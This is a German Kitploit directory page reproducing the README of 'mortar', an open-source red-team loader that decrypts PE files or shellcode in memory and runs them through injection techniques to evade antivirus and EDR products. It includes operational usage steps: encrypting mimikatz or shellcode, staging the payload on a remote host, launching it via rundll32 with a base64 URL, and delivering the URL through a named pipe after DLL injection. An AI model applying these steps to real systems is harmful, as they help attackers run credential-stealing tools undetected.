Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
mortar — Ausweichtechnik zur Überwindung und Umleitung von Erkennungs- und Präventionsmaßnahmen von Sicherheitsprodukten (AV/EDR/XDR) | Kitploit
Tools/GitHubGitHub/0xsp-srd/mortar
Exploit-FrameworksPayload-GenerierungIDS/IPS-UmgehungShellcodeRed Teaming
GitHub0xsp-srd/mortar

mortar

Ausweichtechnik zur Überwindung und Umleitung von Erkennungs- und Präventionsmaßnahmen von Sicherheitsprodukten (AV/EDR/XDR)

Repository anzeigen
1.5k238vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Mortar Loader

Red-Teaming-Evasion-Technik, um die Erkennung und Verhinderung von Sicherheitsprodukten zu umgehen und abzulenken. Mortar Loader führt die Ver- und Entschlüsselung von PE/Shellcode in den Speicherdatenströmen durch und führt ihn mithilfe verschiedener Injektionstechniken aus. Mortar ist in der Lage, moderne Antivirenprodukte und fortschrittliche XDR-Lösungen zu umgehen und wurde getestet und bestätigt für die folgenden:

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

Aktualisierte Funktionen

Die neuere Version (v3) wurde mit den folgenden Funktionen veröffentlicht:

  • Dateilose Ausführung mit remote gestaffelter verschlüsselter Binärdatei oder Shellcode.
  • Early Bird APC-Injektion.
  • Prozess-Maskerade.
  • Unterstützt Named Pipes.
  • Verschleierung von Zeichenketten und Funktionsaufrufen.
  • Mortar Covert Reload Subroutine.
  • Verzögerungstechniken bei der Ausführung.

Eine technischere Beschreibung finden Sie im folgenden Blogbeitrag: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

Verwendung

Encryptor

Der Encryptor verschlüsselt C-ShellCode und PE-Binärdateien und schreibt die Ausgabe in eine .enc-Datei. Sie können jedes beliebige Payload (MSF/Cobalt/Havoc usw.) verwenden, solange es die x64-Architektur hat und nicht RAW ist.

root@kitploit:~
root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Mortar Loader Bibliothek

Die neuere Version nutzt mehrere Techniken in Kombination mit Remote-Payload-Abruf. Es wird empfohlen, den folgenden Blogbeitrag zu lesen, um weitere Einblicke zu erhalten.

Für Kurzanweisungen:

root@kitploit:~
# PE Forking

1. Hosten Sie Ihre verschlüsselte Binärdatei auf einem entfernten Host.
2. Kodieren Sie die endgültige URL mit Base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. Die Covert Reload Subroutine-Technik ist aktiviert.

Derzeit wird die Early-Bird-Injektion in Kombination mit Named Pipes unterstützt, um Variablen für die endgültige Ausführung zu empfangen.

root@kitploit:~
1. Injizieren Sie die Mortar-DLL in einen entfernten Prozess (DLL-Injektion, Hijacking, Sideloading).
2. Verbinden Sie sich mit der Named Pipe, um Ihre URL zu liefern.
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. Das Payload wird ausgeführt, sobald ein gültiger Wert empfangen wurde.

Kompilieren

Das Projekt wurde mit FPC (Free Pascal) programmiert. Die Kompilierungsverfahren sind unkompliziert: Laden Sie die Lazarus IDE herunter und installieren Sie sie (https://www.lazarus-ide.org/index.php?page=downloads).

Für den Encryptor können Sie ihn aus dem Release-Bereich herunterladen oder einfach mit Lazarus IDE kompilieren.

root@kitploit:~
#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

Veröffentlichungen

  • Die v1-Veröffentlichung: https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Mortar Loader v2 Funktionen: https://0xsp.com/offensive/mortar-loader-v2/
  • CrestCon Asia 2021 Vortrag: https://www.youtube.com/watch?v=H7EMBz7GLMk

Sponsor?

Die Entwicklung von Mortar oder eines anderen geteilten Projekts ist das Ergebnis meiner persönlichen Zeit.

  • Sie zeigen kontinuierliche Wertschätzung für meine Arbeit.
  • Sie erhalten frühen Zugang zu Vorabversionen.
  • Fragen werden beantwortet.
Tool herunterladen